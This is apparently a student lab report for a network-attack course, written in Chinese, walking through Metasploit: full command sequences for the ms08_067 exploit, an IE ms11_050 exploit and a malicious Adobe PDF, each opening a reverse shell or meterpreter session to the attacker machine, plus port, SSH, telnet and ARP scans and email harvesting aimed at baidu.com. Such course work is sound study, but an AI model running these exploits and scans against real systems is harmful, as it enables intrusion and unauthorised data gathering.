20155333 《網絡對抗》 Exp5 MSF基礎應用
20155333 《網絡對抗》 Exp5 MSF基礎應用
基礎問題回答
用自己的話解釋什麽是exploit,payload,encode
- exploit:攻擊手段,是能使攻擊武器(payload)的方法;
- payload:攻擊武器,真正具有攻擊性的代碼;
- encode:編碼方式,根據payload將要被放置的環境選擇合適的編碼方式,使它能夠正常的運行。
實踐
一個主動攻擊實踐,如ms08_067
①攻擊機:kali ②靶機:windows XP SP3(English)
在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
//顯示回連攻擊載荷
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp反向回連
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.146
//攻擊機ip
msf exploit(ms08_067_netapi) > set LPORT 5333
//攻擊端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.18
msf exploit(ms08_067_netapi) > set target 0
//自動選擇目標系統類型,匹配度較高
msf exploit(ms08_067_netapi) > exploit
//攻擊
建立會話,攻擊成功結果如下:
一個針對瀏覽器的攻擊,如ms11_050
①攻擊機:kali ②靶機:WindowsXP Professional sp2/Windows7專業版 ③IE版本:7.0/8.0
在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http
//http反向回連
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.146
//攻擊機ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5333
//攻擊端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5333rh123
//統一資源標識符路徑設置
msf exploit(ms11_050_cobjectelement) > exploit
在瀏覽器輸入http://192.168.43.146:8080/5333rh123,IE出現數據執行保護彈窗和警告彈窗,遇到問題需關閉程序:
修改Internet的安全設置後仍舊失敗了!
一個針對客戶端的攻擊,如Adobe
①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Adobe版本:9.3
在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
//tcp反向回連
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.199.170
//攻擊機ip
msf exploit(adobe_cooltype_sing) > set LPORT 5333
//攻擊端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155333.pdf
//設置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit
//攻擊
成功生成20155333.pdf:
將pdf文件傳送或拷貝到靶機上後,在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:
msf > use exploit/multi/handler
//進入監聽模塊
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向連接
msf exploit(handler) > set LHOST 192.168.199.170
//攻擊機ip
msf exploit(handler) > set LPORT 5333
//攻擊端口固定
msf exploit(handler) > exploit
然後在靶機上打開20155333.pdf文件
連接失敗 ,大概是因為我下載的是Abode Reader XI,已經沒有漏洞了。
成功應用任何一個輔助模塊
可以使用命令msf > show auxiliary
查看所有的輔助模塊:
一、掃描端口
msf > use auxiliary/scanner/portscan/syn
//使用portscan模塊
msf auxiliary(syn) > show options
msf auxiliary(syn) > set RHOSTS 192.168.199.140
//目標
msf auxiliary(syn) > set THREADS 50
//線程
msf auxiliary(syn) > exploit
二、ssh服務器掃描
msf > use auxiliary/scanner/ssh/ssh_version
//使用ssh_version模塊
msf auxiliary(ssh_version) > show options
//查看選項
msf auxiliary(ssh_version) > set RHOSTS 10.107.100.0/24
//目標網段
msf auxiliary(ssh_version) > set THREADS 50
//線程
msf auxiliary(ssh_version) > exploit
三、telnet服務器掃描
msf > use auxiliary/scanner/telnet/telnet_version
//使用telnet_version模塊
msf auxiliary(telnet_version) > show options
//查看選項
msf auxiliary(telnet_version) > set RHOSTS 10.180.100.0/24
//目標網段
msf auxiliary(telnet_version) > set THREADS 50
//線程
msf auxiliary(telnet_version) > exploit
四、搜索網站中的Email地址
msf > use auxiliary/gather/search_email_collector
//使用search_email_collector模塊
msf auxiliary(search_email_collector) > show options
//查看選項
msf auxiliary(search_email_collector) > set DOMAIN baidu.com
//掃描目標
msf auxiliary(search_email_collector) > exploit
五、掃描局域網有多少主機存活
msf > use auxiliary/scanner/discovery/arp_sweep
//使用discovery/arp_sweep模塊
msf auxiliary(arp_sweep) > show options
//查看選項
msf auxiliary(arp_sweep) > set RHOSTS 10.180.100.0/24
//目標網段
msf auxiliary(arp_sweep) > set THREADS 50
//線程
msf auxiliary(arp_sweep) > exploit
嘗試利用ms11_006_createsizeddibsection漏洞進行攻擊
實驗總結與體會
這次實驗的過程可以說是很艱難了,即使參考了學長和其他同學的博客,依舊沒能成功做完所有實踐,希望能夠改進吧。
20155333 《網絡對抗》 Exp5 MSF基礎應用